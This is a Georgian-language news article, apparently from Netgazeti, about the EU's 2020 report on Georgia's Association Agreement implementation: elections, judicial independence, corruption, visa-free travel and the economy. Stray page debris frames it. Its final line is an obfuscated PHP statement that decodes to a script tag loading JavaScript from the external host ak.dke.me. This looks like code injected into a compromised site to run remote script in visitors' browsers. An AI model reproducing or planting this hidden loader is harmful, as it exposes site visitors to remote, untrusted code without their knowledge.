celsiusi
ავერსი შნაიდერი
ევროკომისიამ და ევროკავშირის უმაღლესმა წარმომადგენელმა საგარეო საქმეთა და უსაფრთხოების საკითხებში საქართველოს მიერ 2020 წლის განმავლობაში ასოცირების შეთანხმების შესრულების შესახებ ყოველწლიური ანგარიში გამოაქვეყნეს. ანგარიშის თანახმად, მიუხედავად კორონავირუსის პანდემიასთან დაკავშირებული გამოწვევებისა, საქართველო ასოცირების შესახებ შეთანხმების ფარგლებში აღებული ვალდებულებების ერთგული რჩება, თუმცა საჭიროა შემდგომი ძალისხმევა, განსაკუთრებით მართლმსაჯულების რეფორმის და პოლიტიკური პოლარიზაციის განმუხტვის მიმართულებებით.
 
ანგარიში გამოქვეყნდა ევროკავშირი-საქართველოს ასოცირების საბჭოს მორიგ სხდომამდე, რომელიც 16 მარტს გაიმართება.
 
ანგარიშის თანახმად, 2020 წელს საქართველოს მაჩვენებელი ევროკავშირის დეკლარაციებისა და საბჭოს გადაწყვეტილებების მიერთებასთან დაკავშირებით იყო 62%, რაც უფრო მაღალია 2019 წლის მაჩვენებელთან (55%) შედარებით.
 
არჩევნების შეფასება
 
2020 წლის საპარლამენტო არჩევნების შეფასებისას ევროკავშირი ეყრდნობა ODIHR-ის და ეუთოს, ევროპის საბჭოსა და ნატო-ს საპარლამენტო ასამბლეათა საერთაშორისო დამკვირვებლების მოხსენებას, რომლის თანახმადაც, არჩევნები კონკურენტულ გარემოში ჩატარდა და საერთო ჯამში, ფუნდამენტური თავისუფლებები დაცული იყო.
 
თუმცა, დამკვირვებლებმა აღნიშნეს, რომ არჩევნების ჩატარებაზე გავლენა მოახდინა ამომრჩევლებზე ზეწოლასთან დაკავშირებულმა და მთელი წინასაარჩევნო კამპანიის განმავლობაში და არჩევნების დღეს მმართველ პარტიასა და სახელმწიფოს შორის ზღვარის ბუნდოვანების შესახებ გავრცელებულმა ბრალდებებმა, რამაც პროცესის ზოგიერთი ასპექტის მიმართ საზოგადოების ნდობა შეამცირა, ხოლო სამოქალაქო საზოგადოების ორგანიზაციებმა საჩივრების და აპელაციების განხილვასთან დაკავშირებით ხარვეზების მთელი რიგი აღნიშნეს.
 
“არჩევნების ზოგადად კონკურენტულ გარემოში ჩატარების მიუხედავად, იყო რიგი ხარვეზებისა, რომელმაც პროცესის მიმართ ნდობა შეარყია და ოპოზიციურმა პარტიებმა ახალი მოწვევის პარლამენტის საწყის სხდომებს ბოიკოტი გამოუცხადა. ეს ცხადყოფს შემდგომი დემოკრატიული კონსოლიდაციის საჭიროებას, მათ შორის, ეუთო/ოდირის საბოლოო რეკომენდაციების გათვალისწინებით ინკლუზიური დიალოგის საშუალებით, 2021 წლის ოქტომბრის ადგილობრივი არჩევნების წინ. მოკლევადიან პერიოდში, საჭიროა ინკლუზიური პოლიტიკური შეთანხმება უმრავლესობასა და ოპოზიციას შორის, რათა შესაძლებელი გახდეს პარლამენტში მუშაობა ფართო რეფორმების დღის წესრიგის განსახორციელებლად”, – ნათქვამია ანგარიშში.
 
უფრო ფართო კონტექსტში პოლარიზაციის განმუხტვა ქართულ პოლიტიკასა და მედიაში, ანგარიშის თანახმად, კვლავ გამოწვევად რჩება.
 
“მნიშვნელოვანი გამოწვევები რჩება მართლმსაჯულების დამოუკიდებლობასა და ანგარიშვალდებულებასთან დაკავშირებით”, – ნათქვამია აგნარიშში, რომლის თანახმადაც, საზოგადოების ნდობა იუსტიციის უმაღლესი საბჭოს მიმართ კვლავ დაბალია.
 
დოკუმენტში აღნიშნულია, რომ უზენაესი სასამართლოს მოსამართლეების წარდგენის პროცესთან დაკავშირებით პარლამენტი არ დაელოდა ვენეციის კომისიის მოსაზრებებს, მიუხედავად იმისა, რომ მან ეს დასკვნა მეორე მოსმენის შემდეგ მოითხოვა.
 
“მართლმსაჯულების რეფორმების მეოთხე ტალღის განხორციელება და ზოგადად მართლმსაჯულების სისტემაში ეთიკისა და მიუკერძოებლობის უმაღლესი სტანდარტების დაცვა კვლავ არსებითია 2021 წლის განმავლობაში. მნიშვნელოვანი იქნება უზენაესი სასამართლოს მოსამართლეთა შერჩევის პროცედურის ევროპულ სტანდარტებთან შესაბამისობაში მოყვანა რაც შეიძლება მალე, რომ უზენაესი სასამართლოს სხვა მოსამართლეები არ დაინიშნონ არსებული სამართლებრივი ჩარჩოს საფუძველზე. იუსტიციის უმაღლესი საბჭოს შემდგომი რეფორმა კვლავ პრიორიტეტია”, – ნათქვამია ანგარიშში.
 
კორუფცია
 
კორუფციის პრევენციის ნაწილში ევროკავშირი ამბიციური ანტიკორუფციული დღის წესირგის შექმნის მნიშვნელობაზე საუბრობს. აღნიშნავს, რომ ანტიკორუფციული სააგენტოს შექმნის შესახებ არანაირი გადაწყვეტილება არ არის მიღებული. ასევე, ინფორმაციის თავისუფლების შესახებ კანონმდებლობაზე პასუხისმგებლობის იუსტიციის სამინისტროდან მთავრობის ადმინისტრაციაში გადასვლამ კანონმდებლობის რეფორებაშ დამატებითი შეფერხება გამოიწვია.
 
“საპარლამენტო არჩევნების წინ პოლიტიკური შემოწირულობები შეშფოთებას იწვევს სავარაუდო ინტერესთა კონფლიქტის თვალსაზრისით”, – ნათქვამია ანგარიშში.
 
2019 წლის “საერთაშორისო გამჭვირვალობის” კორუფციის აღქმის ინდექსის მიხედვით, საქართველოს მაჩვენებელია 56/100 (მაჩვენებელი 2019 წლიდან სტაბილურია, მაგრამ უფრო ნაკლებია, ვიდრე 2018 წელს – 58/100), რაც, ევროკავშირის შეფასებით, ანტიკორუფციული ზომების სტაგნაციაზე მიუთითებს.
 
ვიზალიბერალიზაცია
 

ასოცირების შეთანხმების იმპლემენტაციის შესახებ ანგარიშში ნათქვამია, რომ “საჭიროა დაუყოვნებელი მოქმედებები უვიზო მიმოსვლის გამოწვევების მოსაგვარებლად, განსაკუთრებით კი თავშესაფრის უსაფუძვლო მოთხოვნების დიდ რაოდენობასთან დაკავშირებით”.

ევროკავშირის თანახმად, 2020 წლის 10 ივლისს მიღებულმა მესამე ანგარიშმა სავიზო რეჟიმის შეჩერების მექანიზმის ფარგლებში დაადასტურა, რომ სავიზო რეჟიმის ლიბერალიზაციის ნიშნულების შესრულება კვლავ გრძელდება. დაბრუნების მაჩვენებლის შემცირების მიუხედავად, თანამშრომლობა რეადმისიასთან მიმართებაში კარგია.

ეკონომიკა
 
ევროკავშირის ანგარიშში ნათქვამია, რომ 2020 წელს საქართველოს ეკონომიკა არსებით რეცესიაში შევიდა, რაც კორონავირუსის პანდემიით იყო გამოწვეული. ამავდროულად საუბარია იმ გამოწვევებზე, რაც წარმატებული საერთაშორისო რეიტინგების მიუხედავად, ქვეყანაში ბიზნესგარემოს კუთხით არსებობს.
 
“გამოწვევები რჩება მართლმსაჯულების დამოუკიდებლობასთან, სამართლებრივ დასაბუთებასთან და მიმდინარე გამოძიებებთან დაკავშირებით, რომელიც მსხვილ ბიზნესს მოიცავს, რაც ბიზნეს გარემოზე გავლენას ახდენს”, – წერია ანგარიშში.
 
ევროკავშირი მიუთითებს, რომ “რეაბილიტაციისა და კრედიტორთა კოლექტიური დაკმაყოფილების შესახებ”, ასევე, კანონი სააღსრულებო წარმოებათა შესახებ, მესამე პირის მიმართ პასუხისმგებლობის სავალდებულო დაზღვევა იგვიანებდა.
 
ანგარიში აღნიშნავს, რომ საქართველოში მომხმარებელთა დაცვის ერთიანი ჩარჩო არ არსებობს. მარეგულირებელი ორგანოები, რომელიც ფინანსურ, კომუნიკაციურ და ენერგეტიკულ სექტორებს მოიცავენ, მომხმარებელთა უფლებების დაცვის ზომებს შესაბამის სექტორებში ახორციელებენ.
 
“უმნიშვნელოვანესია კორონავირუსის პანდემიით გამოწვეული კრიზისის ინკლუზიური, ეკოლოგიურად დაბალანსებული და მდგრადი დაძლევის უზრუნველყოფა და შემდგომი წინსვლა ციფრული კომპეტენციების გასაძლიერებლად და ციფრული წიგნიერების ასამაღლებლად. სტრუქტურული რეფორმები გადამწყვეტი რჩება, რადგანაც მათი საშუალებით საქართველოს ეკონომიკა ნაკლებად მოწყვლადი ხდება საგარეო მოვლენებთან მიმართებაში, განსაკუთრებით კორონავირუსის პანდემიის მიმართ და საინვესტიციო კლიმატი და ვაჭრობის პოტენციალი უმჯობესდება”, – ნათქვამია ანგარიშში.
 
შეფასებები
 
ანგარიშის თანახმად, ევროკავშირი მტკიცედ უჭერს მხარს საქართველოს სუვერენიტეტსა და
ტერიტორიულ მთლიანობას ქვეყნის  საერთაშორისოდ აღიარებულ საზღვრებში, მათ შორის, სამხრეთ კავკასიისა და საქართველოს კრიზისის საკითხებში ევროკავშირის სპეციალური წარმომადგენლის
ძალისხმევის, ჟენევის საერთაშორისო დისკუსიების თანათავჯდომარეობისა და ევროკავშირის
სადამკვირვებლო მისიის ადგილზე უწყვეტი მუშაობის მეშვეობით.
 
საქართველოს საგარეო საქმეთა სამინისტრო ევროკავშირის ანგარიშთან დაკავშირებით გამოქვეყნებულ პრესრელიზში მიუთითებს, რომ ანგარიშის თანახმად, ქვეყანა წარმატებით აგრძელებდა ასოცირების შეთანხმებით აღებული ვალდებულებების განხორციელებას, მათ შორის ევროკავშირის კანონმდებლობასთან დაახლოებას და ადამიანის უფლებათა დაცვის ევროპული სტანდარტების დანერგვას.
 
„ევროკავშირის ანგარიში საქართველოს მიერ ასოცირების შეთანხმების შესრულების შესახებ, კიდევ ერთხელ ასახავს და პოზიტიურად აფასებს იმ ძალისხმევას, რასაც ქვეყანა ახორციელებს ევროკავშირში ინტეგრაციის გზაზე. დოკუმენტში ცალსახად არის აღნიშნული, რომ კოვიდ-19 პანდემიის კრიზისის მიუხედავად, საქართველო განუხრელად მისდევს არჩეულ ევროპულ გზას და წარმატებით აგრძელებს ასოცირების შეთანხმებით აღებული ვალდებულებების განხორციელებას”, – განაცხადა საქართველოს ვიცე-პრემიერმა, საგარეო საქმეთა მინისტრმა დავით ზალკალიანმა.
 
”ვაფასებთ საქართველოს უწყვეტ წინსვლას რეფორმების გზით, ისევე, როგორც იმ ერთგულებას,  რომელსაც საქართველო იჩენს ჩვენს შორის არსებული ორმხრივი ურთიერთობებისა  და  აღმოსავლეთ პარტნიორობის მიმართ. 2020 წლის საპარლამენტო არჩევნების შემდეგ, სასიცოცხლოდ მნიშვნელოვანია, რომ ყველა პოლიტიკურმა პარტიამ იმოქმედოს ინსტიტუციური ჩარჩოს ფარგლებში, რათა საერთო ენა და არსებული პოლიტიკური სიტუაციიდან გამოსვლის გზა გამონახოს. ეს საშუალებას მისცემს საქართველოს პარლამენტს, მიიღოს გადამწყვეტი ზომები მდგრადი აღდგენისთვის კორონავირუსის პანდემიის შემდეგ და განახორციელოს  უფრო ფართო რეფორმების დღის წესრიგი”, – განაცხადა, თავის მხრივ, ევროკავშირის უმაღლესმა წარმომადგენელმა საგარეო საქმეთა და უსაფრთხოების პოლიტის საკითხებში ჯოზეფ ბორელმა.
 
გასულ წელს, კორონავირუსის პანდემიის დასაძლევად, საქართველოს დასახმარებლად 183 მილიონი ევროს გრანტის მობილიზება მოახდინა, გარდა  ამისა, 150 მილიონი ევრო გამოიყო მაკროფინანსური დახმარების სახით.
 
სამეზობლო პოლიტიკისა და გაფართოების შესახებ მოლაპარაკებების საკითხებში ოლივერ ვარჰეიმ, თქვა, რომ ევროკავშირი გააგრძელებს საქართველოს დახმარებას ეკონომიკური აღდგენისთვის და ასოცირების დღის წესრიგის წინ წასაწევად, ამავდროულად, ამ კონტექსტში და ინვესტიციების გაზრდისთვის ბიზნესგარემოს გაუმჯობესების მნიშვნელობას გაუსვა ხაზი.
 
მოამზადა: ნეტგაზეთი
1514
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");